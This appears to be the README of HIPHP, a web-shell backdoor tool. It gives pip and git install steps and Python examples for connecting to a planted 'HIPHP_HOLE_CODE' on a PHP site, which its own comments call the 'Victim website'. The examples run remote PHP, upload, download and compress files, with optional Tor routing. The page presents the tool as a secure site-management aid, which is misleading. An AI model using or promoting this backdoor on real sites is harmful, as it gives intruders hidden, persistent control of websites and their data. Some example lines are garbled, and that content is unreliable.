The HIPHP BackDoor is an open-source tool that allows for remote control of websites utilizing the PHP programming language via the HTTP/HTTPS protocol. By utilizing the POST/GET method on port 80, users can access a range of functionalities such as file downloading and editing. Additionally, it offers the capability to connect to Tor networks, providing an added layer of security through the use of password protection.
Developed by a team of webmasters who wanted to provide greater control over their sites without relying on third-party software or services, HIPHP is a simple and user-friendly solution. By placing the HIPHP_HOLE_CODE in any PHP file within the site’s directory structure, users are granted access rights to make changes from anywhere in the world. This makes it an ideal solution for website owners looking for greater flexibility when managing their online presence.
Security is a top priority for HIPHP, with regular updates ensuring compatibility across different versions of PHP codebase used by popular content management systems (CMS). Its password protection feature adds an additional layer of defense against unauthorized access. HIPHP is a secure solution for those looking to take back full control over their website hosting environment.
- What is Hipip?
- Table of Contents
- Demo
- How do you use this version of the project?
- All languages used in this project
- Where can you find this project?
- used requirements
- Python Package Installation
- Use hiphp As Script
- Screenshots
- Changelog History
- Limitations
- Development By
- License
- Support
[✓] Command Line Interface (CLI).
[✓] Graphical User Interface (GUI).
[✓] Python Package.
[✓] Script.
[✓] Docker Container.
* Python3
* Shell (Bash)
* Shell (Batch)
* JavaScript
[✓] Github Packages
[✓] requests
[✓] hexor
[✓] biglibrary
[✓] tk
[✓] eel
[✓] readline
[✓] chardet
# Install from PYPI:
❯ pip install hiphp
# OR
❯ python -m pip install hiphp
# Local install:
# Download hiphp from github:
❯ git clone
# OR
# Download hiphp from gitlab:
❯ git clone
# Go to downloaded folder:
❯ cd hiphp
# install
#❯ pip install -r requirements.txt
❯ pip install .
# Uninstall:
❯ pip uninstall hiphp
click to see Demo
# install hiphp package:
# ❯ pip install hiphp
# import hiphp package:
from hiphp import *
# Connect:
p1=hiphp(key="<KEY*>",url="<URL*>",proxies="<PROXIES>",retu=<RETURN>)# Default: retu=False
# * = All inputs must be entered.
# KEY = The password used for encrypt HIPHP_HOLE_CODE.
# URL = Victim website link.
# PROXIES = To use a proxy.
# RETURN = True for return data as a string, false for print data in the console.
from hiphp import *
# Connect:
p1=hiphp(key="123",url="")#Default: retu=False, proxies="".
#p1=hiphp(key="123",url="http://kfdjlkgjflkgjdfkjgkfdjgkjdfkgjk.onion/index.php")# If you use hiphp on .onion sites, you must run tor services or tor browser.
# Get the hole Code:
p1.get_hole()# Copy this code into the file whose path you entered earlier. ex: https://localhost/index.php
# Example:1
# Command:"echo 'this is a test';")
# Example:2
# Run code from file:
p1.run_file("./examples.php")# Run code from file.
p1.run_file("./examples.php","var1==true","var2==hiii")# Run code from file With the entry of variables.
# Example:3
# Upload a file:
p1.upload("./examples.php")# Upload a file to the current directory.
p1.upload("./examples.php","./upload_path/")# Upload a file to a specific directory.
# Example:4
# Compress a path:
p1.compress()# Compress the current directory.
p1.compress("./example/")# Compress a specific directory.
# Example:5
# download a file:"")# download a specific file to the current directory."","<OUT_PATH>")# download a specific file to specific directory.
# Example:6
# Command line interface:
Click to See changelog History
1. When you use hiphp for the first time on a site, the code HIPHP_HOLE_CODE will show you, copy it and upload it to the path you want to connect to, for example 'https://localhost/inc/example.php'.
2. In order for hiphp to work well and without errors, HIPHP_HOLE_CODE must be placed at the top of the target file.
3. hiphp will not work and it will show you a message stating that you are unable to connect to the site if you do not enter the correct path to the location of HIPHP_HOLE_CODE via the link.
4. If you use hiphp on .onion sites, you must run tor services or tor browser.
5. If you are a Windows user, you must modify the "config.ini" file.
Developer / Author: yasserbdj96
The content of this repository is bound by the following LICENSE.
If you enjoy this project and would like to see it continue to improve, or if you would like me to create more interesting projects, please consider sponsoring me.
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